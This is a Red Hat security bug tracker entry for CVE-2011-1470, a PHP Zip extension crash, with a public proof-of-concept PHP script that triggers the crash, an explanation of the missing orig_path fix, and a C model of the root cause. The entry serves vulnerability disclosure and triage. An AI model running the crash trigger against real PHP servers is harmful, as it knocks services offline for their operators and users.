Bug 690911 (CVE-2011-1470)

Summary: CVE-2011-1470 php: crash when processing certain Zip archives
Product: [Other] Security Response
Component: vulnerability
Reporter: Jan Lieskovsky <jlieskov>
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG
Severity: low
Priority: low
Version: unspecified
CC: bressers, dkutalek, fedora, jorton, rpm
Keywords: Security
Hardware: All
OS: Linux
Doc Type: Bug Fix
Last Closed: 2011-10-12 11:42:06 UTC
Bug Blocks: 715030

Description Jan Lieskovsky 2011-03-25 18:54:57 UTC
Common Vulnerabilities and Exposures assigned an identifier CVE-2011-1470 to
the following vulnerability:

The Zip extension in PHP before 5.3.6 allows context-dependent
attackers to cause a denial of service (application crash) via a
ziparchive stream that is not properly handled by the
stream_get_contents function.

References:
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1470
[2] http://bugs.php.net/bug.php?id=53579
[3] http://www.php.net/ChangeLog-5.php

Upstream patch:
[4] http://svn.php.net/viewvc/?view=revision&revision=306493

Comment 1 Jan Lieskovsky 2011-03-25 18:56:35 UTC
Public PoC from [2]:
====================
<?php
// Public PoC from [2]: open a jar (a zip archive), obtain a stream for one
// entry, close the archive, then read the stream. test.jar is any zip
// archive that contains the entry named below.

$target_file = 'META-INF/MANIFEST.MF';

$za = new ZipArchive();
if ($za->open('test.jar') !== TRUE)
{
    return FALSE;   // archive missing or unreadable: stop the script
}

if ($za->statName($target_file) !== FALSE)
{
    $fd = $za->getStream($target_file);   // zip stream for the entry
}
else
{
    $fd = FALSE;
}
$za->close();

if (is_resource($fd))
{
    // reading the zip stream is what crashes the process on affected versions
    echo strlen(stream_get_contents($fd));
}

?>

Comment 8 Huzaifa S. Sidhpurwala 2011-10-12 11:30:18 UTC
Details from Joseph Orton:
=========================

The fix for this one:

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/zip_stream.c?r1=306493&r2=306492&pathrev=306493

ensures stream->orig_path is non-NULL in the zip stream object.

This matters because php_zip_ops_stat assumes ->orig_path is non-NULL:

static int php_zip_ops_stat(php_stream *stream, php_stream_statbuf *ssb TSRMLS_DC) /* {{{ */
{
    struct zip_stat sb;
    const char *path = stream->orig_path;
    int path_len = strlen(stream->orig_path);

But php_zip_ops_stat() was only added in PHP 5.3.4; the function does 
not exist in 5.3.3, nor does anything else in ext/zip which assumes 
stream->orig_path is non-NULL.

Conclusion: CVE-2011-1470 only affects PHP 5.3.4 and 5.3.5.
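
To make the root cause in comment 8 concrete, the following is a small C model added here; it is not PHP's ext/zip code. The structs and the two stream openers (before and after r306493) are stand-ins for php_stream and the zip stream opener, and zip_ops_stat is a model of php_zip_ops_stat with a NULL guard the original lacked.

```c
#include <stdlib.h>
#include <string.h>

/* Stand-ins for php_stream / php_stream_statbuf, cut down to the fields the
 * defect involves; this is a constructed model, not PHP's ext/zip code. */
typedef struct { char *orig_path; unsigned long size; } zip_stream_t;
typedef struct { int path_len; unsigned long size; } zip_statbuf_t;

/* Before r306493: the zip stream opener never set orig_path. */
zip_stream_t *zip_stream_open_before_fix(const char *entry, unsigned long size) {
    zip_stream_t *s = calloc(1, sizeof *s);
    (void)entry;                      /* name dropped: orig_path stays NULL */
    if (s) s->size = size;
    return s;
}

/* After the fix: the opener records the entry name, so orig_path is non-NULL. */
zip_stream_t *zip_stream_open_after_fix(const char *entry, unsigned long size) {
    zip_stream_t *s = calloc(1, sizeof *s);
    if (s) {
        s->orig_path = malloc(strlen(entry) + 1);
        if (s->orig_path) memcpy(s->orig_path, entry, strlen(entry) + 1);
        s->size = size;
    }
    return s;
}

/* Model of php_zip_ops_stat with an added NULL guard (the original quoted in
 * comment 8 ran strlen(stream->orig_path) unguarded). 0 = ok, -1 = no path. */
int zip_ops_stat(const zip_stream_t *s, zip_statbuf_t *sb) {
    if (s == NULL || sb == NULL || s->orig_path == NULL) return -1;
    sb->path_len = (int)strlen(s->orig_path);
    sb->size = s->size;
    return 0;
}

void zip_stream_close(zip_stream_t *s) { if (s) { free(s->orig_path); free(s); } }

/* Opens the PoC's entry name with one of the two openers and stats it.
 * Returns the recorded path length, or -1 when stat refused the stream. */
int stat_manifest(int use_fixed_opener) {
    const char *entry = "META-INF/MANIFEST.MF";        /* entry from the PoC */
    zip_stream_t *s = use_fixed_opener ? zip_stream_open_after_fix(entry, 42)
                                       : zip_stream_open_before_fix(entry, 42);
    zip_statbuf_t sb = { -1, 0 };
    int rc = zip_ops_stat(s, &sb);
    zip_stream_close(s);
    return rc == 0 ? sb.path_len : -1;
}
```

With the pre-fix opener the guarded stat returns -1 where the unguarded original would have dereferenced NULL; with the fixed opener it reports the 20-character entry name.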

Comment 9 Huzaifa S. Sidhpurwala 2011-10-12 11:37:50 UTC
Statement:

This issue does not affect the version of php shipped with Red Hat Enterprise
Linux 4, 5 and 6. This issue does not affect the version of php53 shipped with
Red Hat Enterprise Linux 5.